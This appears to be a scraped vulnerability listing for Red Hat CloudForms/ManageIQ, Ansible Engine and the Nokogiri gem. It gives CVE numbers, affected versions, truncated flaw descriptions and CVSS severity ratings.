CVE-2014-8164

all versions

A insecure configuration for certificate verification (http.verify_mode = OpenSSL::SSL::VERIFY_NONE) may lead to verification bypa

9.1CRITICAL

CVE-2020-14324

< 5.11.7.0

A high severity vulnerability was found in all active versions of Red Hat CloudForms before 5.11.7.0. The out of band OS command i

9.1CRITICAL

CVE-2020-14296

all versions

Red Hat CloudForms 4.7 and 5 was vulnerable to Server-Side Request Forgery (SSRF) flaw. With the access to add Ansible Tower provi

7.1HIGH

CVE-2020-10780

all versions

Red Hat CloudForms 4.7 and 5 is affected by CSV Injection flaw, a crafted payload stays dormant till a victim export as CSV and op

6.3MEDIUM

CVE-2019-14894

all versions

A flaw was found in the CloudForms management engine version 5.10 and CloudForms management version 5.11, which triggered remote c

8.0HIGH

CVE-2019-14905

all versions

A vulnerability was found in Ansible Engine versions 2.9.x before 2.9.3, 2.8.x before 2.8.8, 2.7.x before 2.7.16 and earlier, wher

5.6MEDIUM

CVE-2020-1740

all versions

A flaw was found in Ansible Engine when using Ansible Vault for editing encrypted files. When a user executes "ansible-vault edit"

3.9LOW

CVE-2020-1738

all versions

A flaw was found in Ansible Engine when the module package or service is used and the parameter 'use' is not specified. If a previ

3.9LOW

CVE-2020-1736

all versions

A flaw was found in Ansible Engine when a file is moved using atomic_move primitive as the file mode cannot be specified. This set

2.2LOW

CVE-2020-1735

all versions

A flaw was found in the Ansible Engine when the fetch module is used. An attacker could intercept the module, inject a new path, a

4.2MEDIUM

CVE-2020-1739

all versions

A flaw was found in Ansible 2.7.16 and prior, 2.8.8 and prior, and 2.9.5 and prior when a password is set with the argument "passw

3.9LOW

CVE-2020-1733

all versions

A race condition flaw was found in Ansible Engine 2.7.17 and prior, 2.8.9 and prior, 2.9.6 and prior when running a playbook with

5.0MEDIUM

CVE-2012-6685

all versions

Nokogiri before 1.5.4 is vulnerable to XXE attacks

7.5HIGH

CVE-2019-14864

all versions

Ansible, versions 2.9.x before 2.9.1, 2.8.x before 2.8.7 and Ansible versions 2.7.x before 2.7.15, is not respecting the flag no_l

6.5MEDIUM

CVE-2014-3536

all versions

CFME (CloudForms Management Engine) 5: RHN account information is logged to top_output.log during registration

5.5MEDIUM

CVE-2014-0197

>= 5.0 and <= 5.9.3.1

CFME: CSRF protection vulnerability via permissive check of the referrer header

8.8HIGH

CVE-2018-10854

all versions

cloudforms version, cloudforms 5.8 and cloudforms 5.9, is vulnerable to a cross-site-scripting. A flaw was found in CloudForms's v

5.4MEDIUM

CVE-2013-6461

all versions

Nokogiri gem 1.5.x and 1.6.x has DoS while parsing XML entities by failing to apply limits

6.5MEDIUM

CVE-2013-6460

all versions

Nokogiri gem 1.5.x has Denial of Service via infinite loop when parsing XML documents

6.5MEDIUM

CVE-2019-10177

all versions

A stored cross-site scripting (XSS) vulnerability was found in the PDF export component of CloudForms, versions 5.9 and 5.10, due

6.5MEDIUM

CVE-2017-15123

>= 5.8 and <= 5.10

A flaw was found in the CloudForms web interface, versions 5.8 - 5.10, where the RSS feed URLs are not properly restricted to auth

5.3MEDIUM

CVE-2016-5402

all versions

A code injection flaw was found in the way capacity and utilization imported control files are processed. A remote, authenticated

8.8HIGH

CVE-2016-7047

>= 5.6 and < 5.6.3.0

A flaw was found in the CloudForms API before 5.6.3.0, 5.7.3.1 and 5.8.1.2. A user with permissions to use the MiqReportResults ca

4.3MEDIUM

CVE-2016-7071

< 5.6.2.2

It was found that the CloudForms before 5.6.2.2, and 5.7.0.7 did not properly apply permissions controls to VM IDs passed by users

8.8HIGH

CVE-2017-7528

all versions

Ansible Tower as shipped with Red Hat CloudForms Management Engine 5 is vulnerable to CRLF Injection. It was found that X-Forwarde

5.2MEDIUM

CVE-2017-2632

< 5.7.1.3

A logic error in valid_role() in CloudForms role validation before 5.7.1.3 could allow a tenant administrator to create groups wit

4.9MEDIUM

CVE-2017-2653

< 5.7.2.1

A number of unused delete routes are present in CloudForms before 5.7.2.1 which can be accessed via GET requests instead of just P

4.1MEDIUM

CVE-2017-7497

all versions

The dialog for creating cloud volumes (cinder provider) in CloudForms does not filter cloud tenants by user. An attacker with the

4.1MEDIUM

CVE-2017-15125

< 5.9.0.22

A flaw was found in CloudForms before 5.9.0.22 in the self-service UI snapshot feature where the name field is not properly saniti

6.5MEDIUM

CVE-2017-2639

all versions

It was found that CloudForms does not verify that the server hostname matches the domain name in the certificate when using a cust

6.5MEDIUM

CVE-2017-2664

< 5.7.3

CloudForms Management Engine (cfme) before 5.7.3 and 5.8.x before 5.8.1 lacks RBAC controls on certain methods in the rails applic

6.5MEDIUM

CVE-2017-7530

< 5.7.3

In CloudForms Management Engine (cfme) before 5.7.3 and 5.8.x before 5.8.1, it was found that privilege check is missing when invo

8.8HIGH

CVE-2018-10905

all versions

CloudForms Management Engine (cfme) is vulnerable to an improper security setting in the dRuby component of CloudForms. An attacke

7.8HIGH

CVE-2013-2049

all versions

Red Hat CloudForms 2 Management Engine (CFME) allows remote attackers to conduct session tampering attacks by leveraging use of a

7.5HIGH

CVE-2014-0087

< 5.3

The check_privileges method in vmdb/app/controllers/application_controller.rb in ManageIQ, as used in Red Hat CloudForms Managemen

8.8HIGH

CVE-2016-4457

all versions

CloudForms Management Engine before 5.8 includes a default SSL/TLS certificate.

7.5HIGH

CVE-2016-3702

all versions

Padding oracle flaw in CloudForms Management Engine (aka CFME) 5 allows remote attackers to obtain sensitive cleartext information

5.3MEDIUM

CVE-2016-7040

all versions

Red Hat CloudForms Management Engine 4.1 does not properly handle regular expressions passed to the expression engine via the JSON

8.8HIGH

CVE-2015-7502

all versions

Red Hat CloudForms 3.2 Management Engine (CFME) 5.4.4 and CloudForms 4.0 Management Engine (CFME) 5.5.0 do not properly encrypt da

5.1MEDIUM

CVE-2013-2050

all versions

SQL injection vulnerability in the miq_policy controller in Red Hat CloudForms 2.0 Management Engine (CFME) 5.1 and ManageIQ Enter

CVE-2013-2068

all versions

Multiple directory traversal vulnerabilities in the AgentController in Red Hat CloudForms Management Engine 2.0 allow remote attac

CVE-2013-4172

all versions

The Red Hat CloudForms Management Engine 5.1 allow remote administrators to execute arbitrary Ruby code via unspecified vectors.